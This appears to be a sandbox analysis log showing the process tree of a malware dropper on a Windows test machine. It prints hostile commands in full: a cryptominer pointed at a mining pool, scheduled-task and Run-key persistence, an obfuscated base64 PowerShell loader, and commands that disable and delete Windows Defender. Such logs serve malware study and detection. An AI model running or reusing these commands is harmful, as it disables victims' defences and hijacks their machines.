C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵PID:4432
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com4⤵
- Enumerates system info in registry
PID:4080 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵PID:3428
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video4⤵
- Enumerates system info in registry
PID:3908 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵PID:3616
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com4⤵
- Enumerates system info in registry
PID:1856 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵PID:3620
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com4⤵PID:5184
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com5⤵
- Checks processor information in registry
PID:5320 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5320.0.1755213877\1603258636" -parentBuildID 20221007134813 -prefsHandle 1868 -prefMapHandle 1852 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62500a25-2739-4050-befa-eb8002bb9790} 5320 "\\.\pipe\gecko-crash-server-pipe.5320" 1960 26cb06d2458 gpu6⤵PID:6708
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video4⤵PID:5368
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video5⤵PID:5624
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com4⤵PID:2120
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com5⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe"C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:932 -
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBD83.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:852 -
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"6⤵
- Creates scheduled task(s)
PID:3520 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\system32\attrib.exeattrib +H "winhostDhcp.exe"4⤵
- Views/modifies file attributes
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe"winhostDhcp.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dzhJcmA8P8.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:2008
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:756
-
C:\odt\conhost.exe"C:\odt\conhost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\Files\native.exe"C:\Users\Admin\AppData\Local\Temp\Files\native.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exe"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\Files\native.exeC:\Users\Admin\AppData\Local\Temp\Files\native.exe3⤵
- Executes dropped EXE
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe"C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe"2⤵
- Executes dropped EXE
PID:3280 -
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bat.bat3⤵PID:5084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\bat.bat4⤵PID:4672
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"5⤵PID:1816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')6⤵PID:2480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\bat')6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3788 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"6⤵PID:2972
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"7⤵PID:380
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"8⤵PID:3280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe8⤵
- Blocklisted process makes network request
PID:4072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵PID:3216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')9⤵PID:4088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')9⤵PID:3140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force9⤵PID:3444
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gcFlBSmEoJHNORFFLKXskbXpYYlU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JG16WGJVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskbXpYYlUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRtelhiVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUThwVWY3K2hyVHVmb1JYSUpwMHRqME1NV3llMld1WnJNK2xFSTdJc1YvST0nKTskbXpYYlUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUVVTbGNFdDNQMVYvbE1ucTJ6SnpHUT09Jyk7JGJ2eWxCPSRtelhiVS5DcmVhdGVEZWNyeXB0b3IoKTskZ1hwcFg9JGJ2eWxCLlRyYW5zZm9ybUZpbmFsQmxvY2soJHNORFFLLDAsJHNORFFLLkxlbmd0aCk7JGJ2eWxCLkRpc3Bvc2UoKTskbXpYYlUuRGlzcG9zZSgpOyRnWHBwWDt9ZnVuY3Rpb24gSUFGaUUoJHNORFFLKXskQWxKaVQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkc05EUUspOyRLbHFseD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG5IU0l0PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEFsSmlULFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbkhTSXQuQ29weVRvKCRLbHFseCk7JG5IU0l0LkRpc3Bvc2UoKTskQWxKaVQuRGlzcG9zZSgpOyRLbHFseC5EaXNwb3NlKCk7JEtscWx4LlRvQXJyYXkoKTt9JGhUdG9sPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskaEdyRW49SUFGaUUgKHBZQUphIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJGhUdG9sLCA1KS5TdWJzdHJpbmcoMikpKSk7JGxWQkxvPUlBRmlFIChwWUFKYSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRoVHRvbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kbFZCTG8pLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGhHckVuKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "8⤵PID:4648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gcFlBSmEoJHNORFFLKXskbXpYYlU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JG16WGJVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskbXpYYlUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRtelhiVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUThwVWY3K2hyVHVmb1JYSUpwMHRqME1NV3llMld1WnJNK2xFSTdJc1YvST0nKTskbXpYYlUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUVVTbGNFdDNQMVYvbE1ucTJ6SnpHUT09Jyk7JGJ2eWxCPSRtelhiVS5DcmVhdGVEZWNyeXB0b3IoKTskZ1hwcFg9JGJ2eWxCLlRyYW5zZm9ybUZpbmFsQmxvY2soJHNORFFLLDAsJHNORFFLLkxlbmd0aCk7JGJ2eWxCLkRpc3Bvc2UoKTskbXpYYlUuRGlzcG9zZSgpOyRnWHBwWDt9ZnVuY3Rpb24gSUFGaUUoJHNORFFLKXskQWxKaVQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkc05EUUspOyRLbHFseD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG5IU0l0PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEFsSmlULFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbkhTSXQuQ29weVRvKCRLbHFseCk7JG5IU0l0LkRpc3Bvc2UoKTskQWxKaVQuRGlzcG9zZSgpOyRLbHFseC5EaXNwb3NlKCk7JEtscWx4LlRvQXJyYXkoKTt9JGhUdG9sPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskaEdyRW49SUFGaUUgKHBZQUphIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJGhUdG9sLCA1KS5TdWJzdHJpbmcoMikpKSk7JGxWQkxvPUlBRmlFIChwWUFKYSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRoVHRvbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kbFZCTG8pLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGhHckVuKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "5⤵PID:884
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\Files\32.exe"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"2⤵
- Executes dropped EXE
PID:4044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 2723⤵
- Program crash
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"2⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
PID:3284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"3⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6476 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"3⤵
- Checks computer location settings
PID:3960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "4⤵PID:6420
-
C:\DriverHostCrtNet\comSvc.exe"C:\DriverHostCrtNet\comSvc.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
PID:4936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵PID:6748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵PID:4164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵PID:6952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵PID:6752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵PID:6968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵PID:7100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵PID:6940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵PID:6960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵PID:6208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵PID:5364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'6⤵PID:6800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵PID:5912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵PID:7056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iR4PpyYAmz.bat"6⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe"C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat" "3⤵PID:6264
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f4⤵
- Adds Run key to start application
PID:6852 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:6868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang.bat" "5⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang_executor.exebang_executor.exe6⤵
- Executes dropped EXE
PID:6152 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\executer.exeexecuter.exe6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4032 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; 